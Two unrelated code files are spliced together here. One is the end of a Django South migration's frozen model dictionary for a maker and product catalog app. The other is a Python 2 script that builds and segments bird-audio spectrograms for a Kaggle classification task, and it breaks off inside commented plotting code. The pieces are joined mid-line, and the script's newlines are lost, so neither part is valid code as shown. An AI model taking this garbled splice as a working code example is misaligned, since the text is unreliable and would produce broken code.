'symmetrical': 'False', 'to': u"orm['auth.User']"}), 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_private': ('django.db.models.fields.BooleanField', [], {}), 'items': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalog.ListItem']", 'symmetrical': 'False'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'owner'", 
'to': u"orm['auth.User']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.listgroup': { 'Meta': {'object_name': 'ListGroup'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'lists': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalog.List']", 'symmetrical': 'False'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.listitem': { 'Meta': {'object_name': 'ListItem'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'createdby': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'note': ('django.db.models.fields.CharField', [], {'max_length': '500'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.location': { 'Meta': {'object_name': 'Location'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.logidenticalproduct': { 'Meta': {'object_name': 'LogIdenticalProduct'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'product1': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'product1'", 'to': "orm['catalog.Product']"}), 'product2': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'product2'", 'to': "orm['catalog.Product']"}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.makey': { 'Meta': {'object_name': 'Makey'}, 'about': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}), 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'collaborators': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'collaborators'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['auth.User']"}), 'comments': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeycomments'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Comment']"}), 'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'documentations': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeydocumentations'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Documentation']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'images': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeyimages'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Image']"}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'name': 
('django.db.models.fields.CharField', [], {'max_length': '200'}), 'new_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeys'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.NewProduct']"}), 'new_users': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeys'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.NewUser']"}), 'notes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeynotes'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Note']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}), 'videos': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'makeyvideos'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Video']"}), 'votes': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}) }, 'catalog.makeyimage': { 'Meta': {'object_name': 'MakeyImage'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'makey_id': ('django.db.models.fields.IntegerField', [], {}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.newproduct': { 'Meta': {'object_name': 'NewProduct'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Image']", 'null': 'True', 'blank': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}) }, 'catalog.newuser': { 'Meta': {'object_name': 'NewUser'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.note': { 'Meta': {'object_name': 'Note'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'body': ('django.db.models.fields.CharField', [], {'max_length': '1000'}), 'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'likes_count': ('django.db.models.fields.IntegerField', [], 
{'default': '0'}), 'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'null': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.product': { 'Meta': {'object_name': 'Product'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'identicalto': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']", 'null': 'True', 'blank': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'likers': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'product_likes'", 'symmetrical': 'False', 'through': "orm['catalog.LikeProduct']", 'to': u"orm['auth.User']"}), 'makeys': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'partsused'", 'blank': 'True', 'to': "orm['catalog.Makey']"}), 'makeys_as_tools': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'tools_used'", 'blank': 'True', 'to': "orm['catalog.Makey']"}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'sku': ('django.db.models.fields.IntegerField', [], {}), 'tutorials': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'products'", 'blank': 'True', 'to': "orm['catalog.Tutorial']"}) }, 'catalog.productdescription': { 'Meta': {'object_name': 'ProductDescription'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'description': ('django.db.models.fields.CharField', [], {'max_length': '100000'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'productdescriptions'", 'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']", 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'blank': 'True'}), 'user_or_shop': ('django.db.models.fields.BooleanField', [], {}) }, 'catalog.productimage': { 'Meta': {'object_name': 'ProductImage'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'productimages'", 'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']", 'null': 'True', 'blank': 'True'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}) }, 'catalog.productreview': { 'Meta': {'object_name': 'ProductReview'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': 
('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'product_reviews'", 'to': "orm['catalog.Product']"}), 'rating': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'review': ('django.db.models.fields.CharField', [], {'max_length': '100000'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.productshopurl': { 'Meta': {'object_name': 'ProductShopUrl'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'productshopurls'", 'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']"}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}) }, 'catalog.searchlog': { 'Meta': {'object_name': 'SearchLog'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'term': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'time': ('django.db.models.fields.DateTimeField', [], {}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}) }, 'catalog.shop': { 'Meta': {'object_name': 'Shop'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'images': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'shopimages'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Image']"}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'likes': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'shop_likes'", 'symmetrical': 'False', 'through': "orm['catalog.LikeShop']", 'to': u"orm['auth.User']"}), 'location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Location']"}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}) }, 'catalog.shopreview': { 'Meta': {'object_name': 'ShopReview'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'rating': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'review': ('django.db.models.fields.CharField', [], {'max_length': '100000'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'shop': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shop_reviews'", 'to': "orm['catalog.Shop']"}), 'title': ('django.db.models.fields.CharField', 
[], {'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.toindexstore': { 'Meta': {'object_name': 'ToIndexStore'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Location']"}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}) }, 'catalog.topmakeys': { 'Meta': {'object_name': 'TopMakeys'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'makey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.topproducts': { 'Meta': {'object_name': 'TopProducts'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.topshops': { 'Meta': {'object_name': 'TopShops'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']"}) }, 'catalog.toptutorials': { 'Meta': {'object_name': 'TopTutorials'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'tutorial': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Tutorial']"}) }, 'catalog.topusers': { 'Meta': {'object_name': 'TopUsers'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.tutorial': { 'Meta': {'object_name': 'Tutorial'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'description': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'images': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'tutorialimages'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Image']"}), 'is_enabled': 
('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}), 'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'catalog.userflags': { 'Meta': {'object_name': 'UserFlags'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'show_maker_intro': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'show_makey_intro': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.userinteraction': { 'Meta': {'object_name': 'UserInteraction'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'event': ('django.db.models.fields.IntegerField', [], {}), 'event_id': ('django.db.models.fields.IntegerField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}) }, 'catalog.userprofile': { 'Meta': {'object_name': 'UserProfile'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': u"orm['auth.User']"}) }, 'catalog.video': { 'Meta': {'object_name': 'Video'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), 'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}), 'embed_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'site': ('django.db.models.fields.IntegerField', [], {}), 'thumb_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}) }, 'catalog.votemakey': { 'Meta': {'unique_together': "(('user', 'makey'),)", 'object_name': 'VoteMakey'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'makey': 
('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'}) }, 'catalog.voteproductreview': { 'Meta': {'unique_together': "(('user', 'review'),)", 'object_name': 'VoteProductReview'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'review': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ProductReview']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'}) }, 'catalog.voteshopreview': { 'Meta': {'unique_together': "(('user', 'review'),)", 'object_name': 'VoteShopReview'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'review': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ShopReview']"}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'}) }, 'catalog.votetutorial': { 'Meta': {'unique_together': "(('user', 'tutorial'),)", 'object_name': 'VoteTutorial'}, 'added_time': ('django.db.models.fields.DateTimeField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'tutorial': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Tutorial']"}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}), 'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'}) }, u'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) } } complete_apps = ['catalog']
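# Hedged sketch (not generated by South; kept commented out so this migration
# module stays import-safe): roughly the Django 1.x model code that the
# LikeVideo table and the Video.likes_count column above correspond to. Field
# names, defaults, and the unique constraint are read off the frozen ORM dict;
# the app's real models.py may well differ.
#
#     from django.contrib.auth.models import User
#     from django.db import models
#
#     class LikeVideo(models.Model):
#         added_time = models.DateTimeField()
#         is_enabled = models.BooleanField(default=True)
#         score = models.IntegerField(default=0)
#         user = models.ForeignKey(User)
#         video = models.ForeignKey('Video')
#
#         class Meta:
#             unique_together = (('user', 'video'),)
#
#     # ...plus, on the existing Video model:
#     # likes_count = models.IntegerField(default=0)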
import numpy as np import pandas as pd import scipy as sp import pickle from scipy import fft from time import localtime, strftime import matplotlib.pyplot as plt from skimage.morphology import disk,remove_small_objects from skimage.filter import rank from skimage.util import img_as_ubyte import wave ########################### # Folder Name Setting ########################### folder = 'J:/DATAMINING/KAGGLE/MLSP_BirdClassification/' essential_folder = folder+'essential_data/' supplemental_folder = folder+'supplemental_data/' spectro_folder =folder+'my_spectro/' single_spectro_folder =folder+'my_spectro_single/' dp_folder = folder+'DP/' ################################################### ## Read the Essential Data ## labels, training-test split,file_names etc. ################################################### # Each audio file has a unique recording identifier ("rec_id"), ranging from 0 to 644. # The file rec_id2filename.txt indicates which wav file is associated with each rec_id. rec2f = pd.read_csv(essential_folder + 'rec_id2filename.txt', sep = ',') # There are 19 bird species in the dataset. species_list.txt gives each a number from 0 to 18. species = pd.read_csv(essential_folder + 'species_list.txt', sep = ',') num_species = 19 # The dataset is split into training and test sets. # CVfolds_2.txt gives the fold for each rec_id. 0 is the training set, and 1 is the test set. cv = pd.read_csv(essential_folder + 'CVfolds_2.txt', sep = ',') # This is your main label training data. For each rec_id, a set of species is listed. The format is: # rec_id,[labels] raw = pd.read_csv(essential_folder + 'rec_labels_test_hidden.txt', sep = ';') label = np.zeros(len(raw)*num_species) label = label.reshape([len(raw),num_species]) for i in range(len(raw)): line = raw.irow(i) labels = line[0].split(',') labels.pop(0) # rec_id == i for c in labels: if(c != '?'): label[i,c] = 1 label = pd.DataFrame(label) label['rec_id'] = cv.rec_id label['fold'] = cv.fold label['filename'] = rec2f.filename # Sparse training set # training species 1%--5%--20% spec_avg = label[label.fold ==0][range(num_species)].mean() spec_avg.sort() plt.plot(spec_avg,'go') # Read the audio files # /src_wavs # This folder contains the original wav files for the dataset (both training and test sets). # These are 10-second mono recordings sampled at 16kHz, 16 bits per sample. 
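###########################
# Worked sample-count math
###########################
# Assumption: every recording really is 10 s of mono audio at 16 kHz with
# 16 bits per sample, as the comment above states. That is why the
# spectrogram code below uses N = 160000 samples per file and why
# wav_to_floats() reads the frames as np.short (16-bit integers).
SAMPLE_RATE_HZ = 16000   # illustrative constants, not used by the original code
CLIP_SECONDS = 10
assert SAMPLE_RATE_HZ * CLIP_SECONDS == 160000   # matches N below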
def pic_to_ubyte (pic): a = (pic-np.min(pic) ) /(np.max(pic - np.min(pic))) a = img_as_ubyte(a) return a # Parameters to create the spectrogram N = 160000 K = 512 Step = 4 wind = 0.5*(1 -np.cos(np.array(range(K))*2*np.pi/(K-1) )) ffts = [] def wav_to_floats(filename): s = wave.open(filename,'r') strsig = s.readframes(s.getnframes()) y = np.fromstring(strsig, np.short) s.close() return y ############################### ## Create the Spectrograms ## Train + Test ############################### print strftime("%a, %d %b %Y %H:%M:%S +0000", localtime()) for file_idx in range(len(label)): test_flag = label.irow(file_idx)['fold'] fname = label.irow(file_idx)['filename'] species_on_pic = [] for n in range(num_species): if(label.irow(file_idx)[n] > 0): species_on_pic.append(n) S = wav_to_floats(essential_folder+'src_wavs/'+fname+'.wav') Spectogram = [] for j in range(int(Step*N/K)-Step): vec = S[j * K/Step : (j+Step) * K/Step] * wind Spectogram.append(abs(fft(vec,K)[:K/2])) ffts.append(np.array(Spectogram)) print strftime("%a, %d %b %Y %H:%M:%S +0000", localtime()) SPEC_SEGMENTS = [] LOG_SPEC_SEGMENTS = [] MIN_SEGMENT_SIZE = 99 p = 90 #fig = plt.figure(figsize=(20, 10)) for file_idx in range(len(label)): test_flag = label.irow(file_idx)['fold'] fname = label.irow(file_idx)['filename'] species_on_pic = [] for n in range(num_species): if(label.irow(file_idx)[n] > 0): species_on_pic.append(n) label_count = label.irow(file_idx)[range(num_species)].sum() bird_spec = label.irow(file_idx)[range(num_species)].argmax() # first bird if(test_flag < 1 and label_count ==1): mypic = np.transpose(ffts[file_idx]) mypic_rev = np.zeros_like(mypic) for i in range(mypic.shape[0]): mypic_rev[i] = mypic[-i - 1] mypic_rev_small = mypic_rev[:200,:] mypic_rev = mypic_rev_small mypic_rev_log = np.log10(mypic_rev+ 0.001) mypic_rev_gauss =sp.ndimage.gaussian_filter(mypic_rev, sigma=3) mypic_rev_log_gauss = sp.ndimage.gaussian_filter(mypic_rev_log, sigma=3) mypic_rev_gauss_bin = mypic_rev_gauss > np.percentile(mypic_rev_gauss,p) mypic_rev_log_gauss_bin = mypic_rev_log_gauss > np.percentile(mypic_rev_log_gauss,p) mypic_rev_gauss_bin_close =sp.ndimage.binary_closing( sp.ndimage.binary_opening(mypic_rev_gauss_bin)) mypic_rev_log_gauss_bin_close =sp.ndimage.binary_closing( sp.ndimage.binary_opening(mypic_rev_log_gauss_bin)) mypic_rev_gauss_grad = rank.gradient(pic_to_ubyte(mypic_rev_gauss), disk(3)) mypic_rev_log_gauss_grad = rank.gradient(pic_to_ubyte(mypic_rev_log_gauss), disk(3)) mypic_rev_gauss_grad_bin = mypic_rev_gauss_grad > np.percentile(mypic_rev_gauss_grad,p) mypic_rev_log_gauss_grad_bin = mypic_rev_log_gauss_grad > np.percentile(mypic_rev_log_gauss_grad,p ) mypic_rev_gauss_grad_bin_close =sp.ndimage.binary_closing( sp.ndimage.binary_opening(mypic_rev_gauss_grad_bin)) mypic_rev_log_gauss_grad_bin_close =sp.ndimage.binary_closing( sp.ndimage.binary_opening(mypic_rev_log_gauss_grad_bin)) bfh = sp.ndimage.binary_fill_holes(mypic_rev_gauss_grad_bin_close) bfh_rm = remove_small_objects(bfh, MIN_SEGMENT_SIZE) log_bfh = sp.ndimage.binary_fill_holes(mypic_rev_log_gauss_grad_bin_close) log_bfh_rm = remove_small_objects(log_bfh, MIN_SEGMENT_SIZE) # plt.subplot(6,2,1) # plt.imshow(mypic_rev,cmap=plt.cm.afmhot_r) # plt.axis('off') # plt.title('Spectrogram') # plt.subplot(6,2,2) # plt.imshow(mypic_rev_log,cmap=plt.cm.afmhot_r) # plt.axis('off') # plt.title('Spectrogram (log)') # plt.subplot(6,2,3) # plt.imshow(mypic_rev_log_gauss,cmap=plt.cm.afmhot_r) # plt.axis('off') # plt.title('+ Gaussian Filtering') # plt.subplot(6,2,4) # 
